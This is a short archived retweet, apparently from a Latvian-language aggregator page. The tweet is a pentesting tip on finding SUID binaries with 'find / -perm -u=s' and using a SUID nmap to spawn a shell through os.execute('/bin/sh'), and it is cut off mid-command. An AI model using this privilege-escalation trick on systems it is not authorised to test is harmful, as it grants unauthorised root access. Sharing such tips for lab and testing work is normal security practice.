RT @gotr00t0day: If you ever find nmap in the SUID using: find / -perm -u=s -type f 2>/dev/nul You can use: echo "os.execute('/bin/sh')"… 0 atbildes

Kirils Solovjovs
(2021-01-15 21:25:42)
@twitter
RT @gotr00t0day: If you ever find nmap in the SUID using: find / -perm -u=s -type f 2>/dev/nul You can use: echo "os.execute('/bin/sh')"…

© 2009-2017 civciv ;)